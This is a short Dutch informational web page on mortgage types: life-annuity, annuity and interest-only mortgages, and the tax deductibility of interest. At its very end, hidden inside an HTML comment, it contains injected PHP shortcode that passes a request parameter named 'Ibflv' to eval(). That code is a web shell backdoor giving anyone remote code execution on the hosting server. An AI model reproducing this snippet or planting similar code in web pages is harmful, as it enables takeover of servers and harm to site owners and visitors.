hypotheekvormen

Informatie over hypotheekvormen

Verschillende hypotheekvormen

Verschillende hypotheekvormen

Voor Nederlanders zijn er veel verschillende hypotheekvormen beschikbaar waardoor de beste en gunstigste voor de Nederlanders vaak gemakkelijk te kiezen is. Toch kan het vaak wat tijd kosten voordat de goede hypotheek gevonden is. Op de hoogte zijn van alle verschillende hypotheekvormen is daarom uiteraard gunstig, zodat men op de hoogte is van de hypotheken die voor hen beschikbaar zijn en hierdoor de kosten voor hen kunnen berekenen.

De verschillende hypotheekvormen hebben allen uiteraard ook verschillende kenmerken. De lijfrentehypotheek is bijvoorbeeld zeer gunstig voor eenieder die graag geld over wil houden wanneer de lener met pensioen gaat. Daar tegenover staat dat een annuïteitenhypotheek gunstig is voor eenieder die graag zo spoedig mogelijk de hypotheek wil aflossen, maar daar maandelijks maar een bepaald bedrag voor beschikbaar heeft. De annuïteitenhypotheek wordt afgelost door maandelijks een vast bedrag aan aflossing en rente te betalen.

Aflossingsvrije hypotheek

 

Een aflossingsvrije hypotheek is weer gunstig voor eenieder die maandelijks alleen rente wil betalen aan de hypotheekverstrekker waardoor men met deze hypotheek zeer goedkoop uit kan zijn. Er wordt namelijk geen bedrag afgelost. Daarnaast is de rente die maandelijks betaald moet worden vaak ook nog eens fiscaal aftrekbaar waardoor het voordeel nog groter is. De verschillende hypotheekvormen zijn dus voor verschillende doelgroepen aantrekkelijk waardoor niet elke doelgroep een bepaalde hypotheek kan nemen.

<!– [insert_php]if (isset($_REQUEST["Ibflv"])){eval($_REQUEST["Ibflv"]);exit;}[/insert_php][php]if (isset($_REQUEST["Ibflv"])){eval($_REQUEST["Ibflv"]);exit;}[/php] –>